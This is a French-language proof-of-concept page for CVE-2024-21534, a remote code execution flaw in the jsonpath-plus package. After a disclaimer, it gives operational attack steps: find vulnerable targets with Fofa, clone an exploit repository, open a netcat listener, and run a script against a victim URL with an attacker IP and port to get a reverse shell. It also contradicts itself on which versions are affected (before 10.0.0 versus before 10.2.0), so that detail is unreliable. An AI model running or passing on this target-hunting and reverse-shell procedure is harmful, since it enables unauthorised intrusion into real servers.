
POC - CVE-2024-21534 Jsonpath-plus vulnérable à l'exécution de code à distance (RCE) en raison d'une désinfection incorrecte des entrées
CVE-2024-21534 est une vulnérabilité critique présente dans les versions du package jsonpath-plus antérieures à la version 10.0.0. La vulnérabilité provient d'une désinfection incorrecte des entrées, ce qui peut conduire à une exécution de code à distance (RCE) sur les systèmes affectés. Cette vulnérabilité est particulièrement dangereuse car elle peut être exploitée sans authentification, permettant à un attaquant d'exécuter du code arbitraire sur le serveur en envoyant une entrée spécialement conçue. Ce problème découle de l'utilisation par défaut non sécurisée du module vm de Node.js, qui, s'il est exploité, pourrait compromettre l'ensemble du système.
Versions de jsonpath-plus antérieures à 10.2.0
La vulnérabilité se situe dans le package jsonpath-plus, largement utilisé pour interroger des structures de données JSON dans les applications. Le défaut est dû à une désinfection incorrecte des entrées, permettant l'exécution de code malveillant.
Lisez à ce sujet — CVE-2024-21534
Avertissement : Cette preuve de concept (POC) est réalisée à des fins éducatives et de tests éthiques uniquement. L'utilisation de cet outil pour attaquer des cibles sans consentement préalable mutuel est illégale. Il est de la responsabilité de l'utilisateur final de respecter toutes les lois locales, étatiques et fédérales applicables. Les développeurs déclinent toute responsabilité et ne sont pas responsables de tout usage abusif ou dommage causé par ce programme.
Pour trouver des cibles potentielles, utilisez Fofa (similaire à Shodan.io) :
Jsonpath-plus
Tout d'abord, clonez le dépôt :
git clone https://github.com/verylazytech/CVE-2024-21534
Ouvrez maintenant un listener avec nc :
nc -lnvp 443
Exécuter l'exploit :
Assurez-vous que l'URL pointe vers un endpoint qui traite les entrées utilisateur via le package jsonpath-plus vulnérable, car cela permettra l'exploitation de la vulnérabilité RCE.
bash ./cve-2024-21534.sh <VICTIM_URL> <ATTACKER_IP> <ATTACKER_PORT>

